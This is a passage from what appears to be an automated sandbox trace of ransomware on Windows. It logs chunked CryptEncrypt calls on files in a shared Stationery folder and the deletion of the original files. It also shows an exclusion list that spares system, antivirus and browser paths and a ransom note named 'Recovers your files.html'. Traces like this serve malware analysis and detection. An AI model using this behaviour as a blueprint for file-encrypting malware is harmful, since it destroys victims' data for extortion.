hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.271] GetLastError () returned 0x0 [0163.271] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.271] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.272] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.272] GetLastError () returned 0x0 [0163.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.272] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.272] GetLastError () returned 0x0 [0163.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.272] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.272] GetLastError () returned 0x0 [0163.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.272] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.272] GetLastError () returned 0x0 [0163.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.272] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.272] GetLastError () returned 0x0 [0163.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.272] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.272] GetLastError () returned 0x0 [0163.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.272] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.273] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.273] GetLastError () returned 0x0 [0163.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.273] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.273] GetLastError () returned 0x0 [0163.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.273] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.273] GetLastError () returned 0x0 [0163.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.273] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.273] GetLastError () returned 0x0 [0163.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x64, lpOverlapped=0x0) returned 1 [0163.273] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x64, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0163.273] GetLastError () returned 0x0 [0163.273] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0163.273] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.273] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0x20 [0163.274] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf", dwFileAttributes=0x20) returned 0 [0163.274] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf") returned 1 [0163.274] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf")) returned 0 [0163.274] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" [0163.274] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.274] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF132.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf132.tmp")) returned 0xf132 [0163.275] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_2.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF132.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf132.tmp"), dwFlags=0x1) returned 0 [0163.276] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF132.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf132.tmp")) returned 1 [0163.276] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0163.276] wcslen (_String="OK") returned 0x2 [0163.276] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.276] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.276] CryptDestroyKey (hKey=0x9ad638) returned 1 [0163.276] CryptDestroyHash (hHash=0x9ad738) returned 1 [0163.276] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0163.276] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*NMCRYPT") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*Recovers your files.html") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.exe") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.dll") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.lnk") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.bat") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.ini") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.msi") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*.scf") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*pagefile.sys*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*NTUSER.DAT*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*AppData*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\winrar\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\java\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\windows\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\ESET\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\AVG\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\AVIRA\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.276] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*Atheros*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*Realtek*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*bootmgr*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*boot*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*boot*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*CONFIG.SYS*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*IO.SYS*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*MSDOS.SYS*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*NTDETECT.COM*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*ntldr*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*chrome*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*opera*") returned 0 [0163.277] PathMatchSpecW (pszFile="Graph.emf", pszSpec="*firefox*") returned 0 [0163.277] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Graph.emf", pszSpec="*") returned 1 [0163.277] strlen (_Str="NMoreira") returned 0x8 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.277] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.278] CryptGenRandom (in: 